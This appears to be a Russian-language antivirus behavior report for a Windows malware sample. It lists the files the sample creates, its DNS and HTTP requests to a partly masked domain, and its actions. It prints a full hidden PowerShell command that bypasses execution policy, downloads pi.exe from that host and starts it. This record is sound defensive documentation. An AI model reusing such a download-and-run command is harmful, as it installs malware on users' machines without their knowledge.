Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://un#####szesgrowesr.com/tiger/pi.exe как %appdata%\pi.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\pi.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Сетевая активность
TCP
Запросы HTTP GET
- http://un#####szesgrowesr.com/tiger/PI.exe
UDP
- DNS ASK un#####szesgrowesr.com
- DNS ASK cd#.##scordapp.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\pi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://un#####szesgrowesr.com/tiger/PI.exe','%APPDATA%\PI.exe');Start-Process...' (со скрытым окном)
